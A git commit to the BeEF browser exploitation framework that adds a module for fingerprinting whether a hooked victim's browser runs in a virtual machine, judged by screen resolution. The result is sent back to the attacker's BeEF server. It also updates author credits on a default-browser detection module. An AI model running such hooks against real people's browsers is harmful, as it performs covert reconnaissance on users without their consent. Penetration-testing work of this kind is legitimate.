Added Detect Virtual Machine module

2012-12-16 16:22:41 +10:30
parent 4e7e1129bb
commit bdab1028f5
5 changed files with 90 additions and 1 deletions
--- a/modules/browser/detect_default_browser/command.js
+++ b/modules/browser/detect_default_browser/command.js
@@ -4,6 +4,10 @@
 // See the file 'doc/COPYING' for copying permission
 //

+// Written by unsticky
+// Ported to BeEF by bcoles
+// For more information see http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
+
 beef.execute(function() {

 	var mt = document.mimeType;
--- a/modules/browser/detect_default_browser/config.yaml
+++ b/modules/browser/detect_default_browser/config.yaml
@@ -10,7 +10,7 @@ beef:
            category: "Browser"
            name: "Detect Default Browser"
            description: "This module detects which browser is configured as the default web browser."
-            authors: ["bcoles"]
+            authors: ["unsticky", "bcoles"]
            target:
                 working: ["IE"]
                 not_working: ["All"]
--- a/modules/host/detect_vm/command.js
+++ b/modules/host/detect_vm/command.js
@@ -0,0 +1,56 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Written by Jeremiah Grossman
+// Ported to BeEF by bcoles
+// For more information see http://jeremiahgrossman.blogspot.com.au/2009/08/web-pages-detecting-virtualized.html
+
+beef.execute(function() {
+
+	var result;
+	var dimensions = {
+	'320, 200' : '',
+	'320, 240' : '',
+	'640, 480' : '',
+	'800, 480' : '',
+	'768, 576' : '',
+	'854, 480' : '',
+	'1024, 600' : '',
+	'1152, 768' : '',
+	'800, 600' : '',
+	'1024, 768' : '',
+	'1280, 854' : '',
+	'1280, 960' : '',
+	'1280, 1024' : '',
+	'1280, 720' : '',
+	'1280, 768' : '',
+	'1366, 768' : '',
+	'1280, 800' : '',
+	'1440, 900' : '',
+	'1440, 960' : '',
+	'1400, 1050' : '',
+	'1600, 1200' : '',
+	'2048, 1536' : '',
+	'1680, 1050' : '',
+	'1920, 1080' : '',
+	'2048, 1080' : '',
+	'1920, 1200' : '',
+	'2560, 1600' : '',
+	'2560, 2048' : ''
+	};
+
+	var wh = screen.width + ", " + screen.height;
+
+	if (dimensions[wh] != undefined) {
+		result = "Not virtualized";
+	} else {
+		result = "This host is virtualized or uses an unrecognized screen resolution";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
+
+});
+
--- a/modules/host/detect_vm/config.yaml
+++ b/modules/host/detect_vm/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_virtualization:
+            enable: true
+            category: "Host"
+            name: "Detect Virtual Machine"
+            description: "This module uses the host screen resolution as a cheap and easy method to check if the browser is running in a virtual environment.<br/><br/>Unusual screen resolutions, such as those used by wide screen televisions or hand-held devices, may result in false negative results."
+            authors: ["Jeremiah Grossman", "bcoles"]
+            target:
+                 working: ["All"]
--- a/modules/host/detect_vm/module.rb
+++ b/modules/host/detect_vm/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_virtualization < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['result'] = @datastore['result'] if not @datastore['result'].nil?
+		save content
+	end
+
+end